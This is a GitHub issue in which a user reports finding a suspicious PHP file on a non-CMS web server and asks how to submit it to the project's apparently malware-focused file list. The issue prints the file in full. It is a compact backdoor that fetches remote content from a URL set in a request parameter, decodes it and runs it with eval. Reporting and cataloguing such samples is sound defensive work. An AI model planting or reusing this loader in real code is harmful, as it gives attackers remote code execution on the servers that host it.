Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Where to add files that do not fit into a CMS category #23

Open
Xsmael opened this issue Apr 20, 2022 · 0 comments
Open

Where to add files that do not fit into a CMS category #23

Xsmael opened this issue Apr 20, 2022 · 0 comments

Comments

@Xsmael
Copy link

Xsmael commented Apr 20, 2022

Hello,

I 'v seen this php script in one of my servers (i believe its malicious, cause it looks like some PHP injection) , which is running a php-vuejs web app, so no CMS,
How do i add it to your list ?

oaosmsru.php

<?php

$r = 'http://';

$rr = $r.$_GET['vgk4zxwpd9ljcu'];

$f = @file_get_contents($rr);

$h = urldecode(base64_decode($f));

$i = '?>';

$n = $i . $h;

eval($n);

?> 
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant